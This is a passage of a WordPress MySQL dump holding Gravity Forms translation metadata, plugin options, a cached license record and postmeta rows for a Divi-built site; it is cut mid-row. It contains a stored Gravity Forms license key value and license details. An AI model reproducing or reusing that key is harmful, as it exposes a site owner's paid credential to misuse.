00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:23:\"gravityformsgeolocation\";a:1:{s:12:\"translations\";a:12:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-09T11:57:26+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-10T12:47:25+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-20T13:42:26+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-07T10:14:20+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-16T12:09:21+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-23T05:01:50+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-12T14:43:13+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-11T16:29:24+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-14T15:44:32+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-20T18:18:56+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-24T08:10:44+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-06T09:09:55+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgeolocation/gravityformsgeolocation-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:31:\"gravityformsconversationalforms\";a:1:{s:12:\"translations\";a:26:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:15+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:122:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:17+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:122:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:37:12+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:19+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-05T09:38:44+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:46+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:24+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:26+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:32+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:122:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-10T11:16:48+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-20T13:34:10+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:36+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-07T10:43:47+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"id\";a:7:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:40+00:00\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-id_ID.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"id\";i:1;s:3:\"ind\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-16T12:14:02+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-22T00:46:24+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:122:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:50+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-12T14:39:02+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-11T12:36:06+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ro\";a:7:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:36:55+00:00\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-ro_RO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ro\";i:1;s:3:\"ron\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-14T15:15:52+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"sr\";a:7:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:37:05+00:00\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-sr_RS.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sr\";i:1;s:3:\"srp\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-20T18:18:12+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-24T08:19:11+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-06T09:03:32+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:125:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:10:\"1.0-beta-1\";s:7:\"updated\";s:25:\"2023-03-02T20:37:10+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:122:\"https://packages.translationspress.com/rocketgenius/gravityformsconversationalforms/gravityformsconversationalforms-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}}s:13:\"_last_checked\";i:1681902659;}','no'),(9175,'gform_pending_installation','','yes'),(9189,'rg_gforms_key','55648090f048cabf2a0a149489e18f45','yes'),(9197,'gform_enable_toolbar_menu','1','yes'),(9198,'rg_gforms_enable_html5','1','yes'),(9195,'rg_gforms_enable_akismet','1','yes'),(9196,'rg_gforms_currency','USD','yes'),(10561,'ccj__activation_time','1678718073','yes'),(10562,'ccj__version','3.43','yes'),(15632,'optimus','a:6:{s:12:\"copy_markers\";i:0;s:12:\"webp_convert\";i:0;s:16:\"webp_keeporigext\";i:0;s:13:\"keep_original\";i:0;s:16:\"secure_transport\";i:0;s:15:\"manual_optimize\";i:1;}','yes'),(10985,'_transient_timeout_rg_gforms_license','1681989059','no'),(10986,'_transient_rg_gforms_license','a:19:{s:15:\"license_key_md5\";s:32:\"55648090f048cabf2a0a149489e18f45\";s:12:\"date_created\";s:19:\"2014-09-20 18:19:08\";s:12:\"date_expires\";s:19:\"2023-06-11 16:00:00\";s:12:\"renewal_date\";s:19:\"2023-05-12 16:00:00\";s:9:\"is_active\";s:1:\"1\";s:24:\"is_subscription_canceled\";s:1:\"0\";s:12:\"product_code\";s:5:\"GFDEV\";s:12:\"product_name\";s:31:\"Gravity Forms Developer License\";s:18:\"is_near_expiration\";b:0;s:14:\"days_to_expire\";i:53;s:10:\"is_expired\";b:0;s:8:\"is_valid\";b:1;s:22:\"is_past_renewal_period\";b:0;s:9:\"is_legacy\";b:1;s:12:\"is_perpetual\";b:0;s:9:\"max_sites\";s:9:\"unlimited\";s:12:\"active_sites\";i:7;s:15:\"remaining_seats\";s:9:\"unlimited\";s:20:\"is_multisite_allowed\";b:1;}','no'),(12236,'et_pb_signup_4643dfe020321115361bb0db2bcebfcd','off','yes'),(9956,'gfpdf_current_version','6.5.5','yes'),(14182,'dsm-supreme-modules-for-divi-activation-date','1679855839','no'),(13120,'action_scheduler_lock_async-request-runner','1679509721','yes'),(12259,'et_pb_signup_aad155ab10ef0c08ea234cd410422d6a','off','yes'),(12290,'et_pb_signup_bf67853cb8f29624afef81f4fd17a052','off','yes'),(16404,'dsm-supreme-modules-for-divi-no-bug','1','no'),(17608,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes');
/*!40000 ALTER TABLE `wpfi_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_postmeta`
--

DROP TABLE IF EXISTS `wpfi_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=3208 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_postmeta`
--

LOCK TABLES `wpfi_postmeta` WRITE;
/*!40000 ALTER TABLE `wpfi_postmeta` DISABLE KEYS */;
INSERT INTO `wpfi_postmeta` VALUES (2,3,'_wp_page_template','default'),(3159,321,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3161,345,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3160,345,'_et_dynamic_cached_attributes','a:0:{}'),(2793,791,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2200;s:6:\"height\";i:1028;s:4:\"file\";s:41:\"2023/04/Header-Full-Color-2200x1028-2.png\";s:8:\"filesize\";i:3957790;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:71860;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-1024x478.png\";s:5:\"width\";i:1024;s:6:\"height\";i:478;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:791974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40316;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:445749;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1773300;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3092548;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:169553;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1212741;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:193688;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:330040;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-1080x505.png\";s:5:\"width\";i:1080;s:6:\"height\";i:505;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:881627;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:349043;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:42:\"Header-Full-Color-2200x1028-2-1280x720.png\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1512434;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-980x551.png\";s:5:\"width\";i:980;s:6:\"height\";i:551;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:891423;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:41:\"Header-Full-Color-2200x1028-2-480x270.png\";s:5:\"width\";i:480;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:217117;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2544,711,'_menu_item_type','post_type'),(2545,711,'_menu_item_menu_item_parent','0'),(2546,711,'_menu_item_object_id','702'),(2547,711,'_menu_item_object','page'),(2548,711,'_menu_item_target',''),(2549,711,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2550,711,'_menu_item_xfn',''),(2551,711,'_menu_item_url',''),(2559,702,'_et_builder_version','VB|Divi|4.20.4'),(2565,702,'_et_pb_show_page_creation','off'),(2567,702,'_et_builder_dynamic_assets_loading_attr_threshold','7'),(3170,327,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3080,350,'_wp_trash_meta_status','draft'),(3081,350,'_wp_trash_meta_time','1681044208'),(3082,350,'_wp_desired_post_slug',''),(2792,791,'_wp_attached_file','2023/04/Header-Full-Color-2200x1028-2.png'),(15,10,'_et_pb_use_builder','on'),(17,12,'_et_autogenerated_title','0'),(18,12,'_et_default','1'),(19,12,'_et_enabled','1'),(20,12,'_et_header_layout_id','10'),(21,12,'_et_header_layout_enabled','1'),(22,12,'_et_body_layout_id','13'),(23,12,'_et_body_layout_enabled','1'),(24,12,'_et_footer_layout_id','14'),(25,12,'_et_footer_layout_enabled','1'),(27,13,'_et_pb_use_builder','on'),(28,13,'_et_pb_show_page_creation','on'),(29,14,'_et_pb_use_builder','on'),(30,14,'_et_pb_show_page_creation','off'),(32,10,'_et_pb_built_for_post_type','page'),(33,10,'_et_pb_ab_subjects',''),(34,10,'_et_